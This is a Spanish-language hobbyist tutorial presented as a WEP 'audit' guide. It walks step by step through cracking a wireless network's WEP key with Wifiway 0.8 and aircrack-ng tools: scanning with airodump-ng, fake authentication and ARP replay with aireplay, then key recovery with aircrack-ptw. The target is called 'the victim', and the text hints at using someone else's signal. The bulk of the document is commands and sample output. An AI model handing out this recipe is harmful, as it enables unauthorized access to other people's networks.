Manual auditorias WEP Wifiway 0.8
Escribo este manual para platicarles sobre mi experiencia en Wifiway 0.8, usando mi laptop Gateway MX6937M, Wireless IPW3945ABG.
Lo básico para las auditorias WEP es:
***Wifiway (distro de Linux para auditorias o para ser más claros, para hacer hack las redes wireless).
Link:
http://www.wifiway.org/sp/descarga.html Descargar la versión 0.8 ya que con la que trabajaremos.
***Una laptop con tarjeta IPW3945ABG
En mi caso yo tengo una laptop Gateway MX6937m con esa tarjeta de red.
***Una señal wifi cercana de preferencia para practicar usa la de algún amigo etc.
(Usa tu imaginación :)
Bueno tratare de ser lo más claro con esto, y los guiare de la mano con todo los detalles que pueda. Así que empezaremos por paso.
1.- Tienes que arrancar tu imagen de CD en tu laptop ojo en esta parte por que para
usuarios de una gateway MX6937m no les arrancar la imagen, así que tendrán
que hacer esto
Cuando arranque y les muestre el primer menú de todo, si ya han tenido
experiencia en alguna distro live CD ya sabrá de que hablo, ok hagan esto
presionen la tecla TAB y les aparecerá hacia abajo unas letras y al final
de estas escriban irqpoll y le dan enter.
2.- Ya en la distro después que se cargo todo.
Abrimos una consola.
Hacemos:
airodump-ng wifi0

Con esto escaneamos las redes mas cercanas y veremos las señales wifi, con esto
seleccionamos a la rede de la victima y paramos el proceso con Ctrl+c.
3.- Abrimos otra pestaña o otra consola
Hacemos:
ipw3945.sh
este es un script necesario nos pedirá el canal "CH" de la victima, el rate de
captura que sera 2 y al final la BSSID.
4.- En esta etapa crearemos el archivo que contendrá nuestro paquete de capturas
y abrimos otro pestaña.
Hacemos:
airodump-ng -c 6 -w Mipaquetes wifi0
NOTA: pequeña esplicacion de la sintaxis
airodump-ng -c "aquivalaCHdelavictima" -w "cualquiernombreparaelarchivo" wifi0
5.- Hacer la Asociación con la señal wifi.
Hacemos:
aireplay -1 0 -a 00:1A:5C:6A:95:69 -h 00:37:RE:98:HC:2E -e 2WIRE341 wifi0
NOTA: pequeña explicación de la sintaxis
aireplay -1 0 -a BSSID -h TUMAC -e ESSID wifi0
BSSID: es la BSSID de la victima lo puedes ver al principio en el paso 2
ESSID: también ver el paso 2
Para saber tu MAC haces en otra consola esto
ifconfig
Veras unos numero como estos 00-11-22-33-44-55-00-00-00-.....
Solo necesitaras los primeros pares de 6 numeros ok y cambias las "-" por ":"
quedara algo asi 00:11:22:33:44:55
Si consigues la autentificación veras algo parecido a esto:

wifiway:~# aireplay -1 0 -a BSSID -h TUMAC -e ESSID wifi0
18:50:17 Enviando petición de autentificación
18:50:17 Autentificación conseguida
18:50:17 Enviando petición de asociación
18:50:22 Enviando petición de autentificación
18:50:23 Autentificación conseguida
18:50:23 Enviando petición de asociación
18:50:26 Asociación conseguida :-)
wifiway:~#
6.- Después de asociar
Hacemos:
aireplay -3 -b BSSID -h TUMAC wifi0
Y empezaras a ver algo parecido a esto.
wifiway:~# aireplay-ng -3 -b BSSID -h TUMAC wifi0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 1 packets (got 0 ARP requests), sent 0 packets...

Cuando veas que las ARP empiezan a subir quiere decir que todo fue un éxito y
Empezaras a ver algo así
wifiway:~# aireplay-ng -3 -b BSSID -h TUMAC wifi0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 2345 ARP requests), sent 1305 packets...
NOTA: Solo es un ejemplo para que sepas si lo estas haciendo bien, claro que a ti
te saldrán otro numero etc..
Después de paso unos 10 minutos y a ver conseguido una DATA de 100000 podrás ejecutar el paso final
7.- Aircrack
Hacen en una cosola nueva:
ls
Veras varios archivos o unos 3 para ser mas exactos, si recuerdas en el paso 4 creamos un archivo llamado Mipaquetes, bueno ahora lo encontraremos con el nombre de Mipaquetes-01.cap, así como esta el nombre hacemos esto:
aircrack-ptw Mispaquetes-01.cap

Si los DATA's fueron suficiente te mandara esto al final de 5 seg.
Found key with len 05: aqui estara la clave :)